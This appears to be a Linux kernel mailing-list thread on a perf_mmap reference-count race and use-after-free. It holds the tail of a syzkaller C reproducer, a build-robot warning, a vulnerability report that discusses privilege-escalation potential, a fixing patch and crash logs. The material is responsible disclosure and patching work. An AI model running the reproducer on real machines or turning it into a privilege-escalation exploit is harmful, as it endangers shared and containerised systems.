NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Hi Haocheng,

kernel test robot noticed the following build warnings:

[auto build test WARNING on perf-tools-next/perf-tools-next]
[also build test WARNING on tip/perf/core perf-tools/perf-tools linus/master v6.19-rc7 next-20260130]
[cannot apply to acme/perf/core]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]

url:    https://github.com/intel-lab-lkp/linux/commits/Haocheng-Yu/perf-core-Fix-refcount-bug-and-potential-UAF-in-perf_mmap/20260201-193746
base:   https://git.kernel.org/pub/scm/linux/kernel/git/perf/perf-tools-next.git perf-tools-next
patch link:    https://lore.kernel.org/r/20260201113446.4328-1-yuhaocheng035%40gmail.com
patch subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
config: mips-randconfig-r072-20260201 (https://download.01.org/0day-ci/archive/20260202/202602020208.m7KIjdzW-lkp@intel.com/config)
compiler: clang version 22.0.0git (https://github.com/llvm/llvm-project 9b8addffa70cee5b2acc5454712d9cf78ce45710)
smatch version: v0.5.0-8994-gd50c5a4c

If you fix the issue in a separate patch/commit (i.e.
not just a new version of the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/

smatch warnings:
kernel/events/core.c:7183 perf_mmap() warn: inconsistent indenting

vim +7183 kernel/events/core.c

7b732a75047738 kernel/perf_counter.c Peter Zijlstra      2009-03-23  7131  
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7132  static int perf_mmap(struct file *file, struct vm_area_struct *vma)
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7133  {
cdd6c482c9ff9c kernel/perf_event.c   Ingo Molnar         2009-09-21  7134  	struct perf_event *event = file->private_data;
81e026ca47b386 kernel/events/core.c  Thomas Gleixner     2025-08-12  7135  	unsigned long vma_size, nr_pages;
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7136  	mapped_f mapped;
5d299897f1e360 kernel/events/core.c  Peter Zijlstra      2025-08-12  7137  	int ret;
d57e34fdd60be7 kernel/perf_event.c   Peter Zijlstra      2010-05-28  7138  
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7139  	/*
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7140  	 * Don't allow mmap() of inherited per-task counters. This would
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7141  	 * create a performance issue due to all children writing to the
76369139ceb955 kernel/events/core.c  Frederic Weisbecker 2011-05-19  7142  	 * same rb.
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7143  	 */
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7144  	if (event->cpu == -1 && event->attr.inherit)
c7920614cebbf2 kernel/perf_event.c   Peter Zijlstra      2010-05-18  7145  		return -EINVAL;
4ec8363dfc1451 kernel/events/core.c  Vince Weaver        2011-06-01  7146  
43a21ea81a2400 kernel/perf_counter.c Peter Zijlstra      2009-03-25  7147  	if (!(vma->vm_flags & VM_SHARED))
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7148  		return -EINVAL;
26cb63ad11e040 kernel/events/core.c  Peter Zijlstra      2013-05-28  7149  
da97e18458fb42 kernel/events/core.c  Joel Fernandes (Google 2019-10-14  7150) 	ret = security_perf_event_read(event);
da97e18458fb42 kernel/events/core.c  Joel Fernandes (Google 2019-10-14  7151) 	if (ret)
da97e18458fb42 kernel/events/core.c  Joel Fernandes (Google 2019-10-14  7152) 		return ret;
26cb63ad11e040 kernel/events/core.c  Peter Zijlstra      2013-05-28  7153  
7b732a75047738 kernel/perf_counter.c Peter Zijlstra      2009-03-23  7154  	vma_size = vma->vm_end - vma->vm_start;
0c8a4e4139adf0 kernel/events/core.c  Peter Zijlstra      2024-11-04  7155  	nr_pages = vma_size / PAGE_SIZE;
ac9721f3f54b27 kernel/perf_event.c   Peter Zijlstra      2010-05-27  7156  
0c8a4e4139adf0 kernel/events/core.c  Peter Zijlstra      2024-11-04  7157  	if (nr_pages > INT_MAX)
0c8a4e4139adf0 kernel/events/core.c  Peter Zijlstra      2024-11-04  7158  		return -ENOMEM;
9a0f05cb368885 kernel/events/core.c  Peter Zijlstra      2011-11-21  7159  
0c8a4e4139adf0 kernel/events/core.c  Peter Zijlstra      2024-11-04  7160  	if (vma_size != PAGE_SIZE * nr_pages)
0c8a4e4139adf0 kernel/events/core.c  Peter Zijlstra      2024-11-04  7161  		return -EINVAL;
45bfb2e50471ab kernel/events/core.c  Peter Zijlstra      2015-01-14  7162  
d23a6dbc0a7174 kernel/events/core.c  Peter Zijlstra      2025-08-12  7163  	scoped_guard (mutex, &event->mmap_mutex) {
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7164  		/*
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7165  		 * This relies on __pmu_detach_event() taking mmap_mutex after marking
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7166  		 * the event REVOKED. Either we observe the state, or __pmu_detach_event()
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7167  		 * will detach the rb created here.
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7168  		 */
d23a6dbc0a7174 kernel/events/core.c  Peter Zijlstra      2025-08-12  7169  		if (event->state <= PERF_EVENT_STATE_REVOKED)
d23a6dbc0a7174 kernel/events/core.c  Peter Zijlstra      2025-08-12  7170  			return -ENODEV;
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7171  
5d299897f1e360 kernel/events/core.c  Peter Zijlstra      2025-08-12  7172  		if (vma->vm_pgoff == 0)
5d299897f1e360 kernel/events/core.c  Peter Zijlstra      2025-08-12  7173  			ret = perf_mmap_rb(vma, event, nr_pages);
5d299897f1e360 kernel/events/core.c  Peter Zijlstra      2025-08-12  7174  		else
2aee3768239133 kernel/events/core.c  Peter Zijlstra      2025-08-12  7175  			ret = perf_mmap_aux(vma, event, nr_pages);
07091aade394f6 kernel/events/core.c  Thomas Gleixner     2025-08-02  7176  		if (ret)
07091aade394f6 kernel/events/core.c  Thomas Gleixner     2025-08-02  7177  			return ret;
07091aade394f6 kernel/events/core.c  Thomas Gleixner     2025-08-02  7178  
9bb5d40cd93c9d kernel/events/core.c  Peter Zijlstra      2013-06-04  7179  		/*
9bb5d40cd93c9d kernel/events/core.c  Peter Zijlstra      2013-06-04  7180  		 * Since pinned accounting is per vm we cannot allow fork() to copy our
9bb5d40cd93c9d kernel/events/core.c  Peter Zijlstra      2013-06-04  7181  		 * vma.
9bb5d40cd93c9d kernel/events/core.c  Peter Zijlstra      2013-06-04  7182  		 */
1c71222e5f2393 kernel/events/core.c  Suren Baghdasaryan  2023-01-26 @7183  		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7184  		vma->vm_ops = &perf_mmap_vmops;
7b732a75047738 kernel/perf_counter.c Peter Zijlstra      2009-03-23  7185  
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7186  		mapped = get_mapped(event, event_mapped);
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7187  		if (mapped)
da916e96e2dedc kernel/events/core.c  Peter Zijlstra      2024-10-25  7188  			mapped(event, vma->vm_mm);
1e0fb9ec679c92 kernel/events/core.c  Andy Lutomirski     2014-10-24  7189  
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7190  		/*
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7191  		 * Try to map it into the page table. On fail, invoke
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7192  		 * perf_mmap_close() to undo the above, as the callsite expects
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7193  		 * full cleanup in this case and therefore does not invoke
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7194  		 * vmops::close().
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7195  		 */
191759e5ea9f69 kernel/events/core.c  Peter Zijlstra      2025-08-12  7196  		ret = map_range(event->rb, vma);
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7197  		if (ret)
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7198  			perf_mmap_close(vma);
8f75f689bf8133 kernel/events/core.c  Haocheng Yu         2026-02-01  7199  	}
f74b9f4ba63ffd kernel/events/core.c  Thomas Gleixner     2025-08-02  7200  
7b732a75047738 kernel/perf_counter.c Peter Zijlstra      2009-03-23  7201  	return ret;
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7202  }
37d81828385f8f kernel/perf_counter.c Paul Mackerras      2009-03-23  7203  

-- 
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
Author: kernel test robot <lkp@intel.com>
Date: Mon, 2 Feb 2026 02:43:48 +0800
Thread-Id: 20260202162057.7237-1-yuhaocheng035@gmail.com
List: lkml
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux
kernel perf_event subsystem, which I discovered using a modified
syzkaller-based kernel fuzzing tool that I developed.

Summary
-------

A local user can trigger a reference count saturation or a
use-after-free (UAF) vulnerability in the perf_mmap function. This is
caused by a race condition where a ring_buffer object's reference count
is incremented after it has already reached zero.

The vulnerability exists in the perf_mmap() function in
kernel/events/core.c. While the function uses mmap_mutex to protect the
initial buffer setup, it performs subsequent operations (such as
map_range) on event->rb outside of the locked scope. If the event is
closed or the buffer is detached concurrently, the reference count of
the ring_buffer can drop to zero, leading to an 'addition on 0' warning
or a UAF when the kernel attempts to access or increment it later.

I verified this on Linux kernel version 6.18.5.

Environment
-----------

- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

Symptoms and logs
-----------------

The kernel triggers a 'refcount_t: addition on 0; use-after-free'
warning followed by a memory leak warning. The full report is below:

audit: type=1400 audit(1769676568.351:202): avc:  denied  { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS:  00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. It follows this execution flow:

1. Event creation: it initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded hammering: the program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The race: thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability trigger: because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.

5. Crash/warning: when thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}
 
 	return ret;
 }
-- 
2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
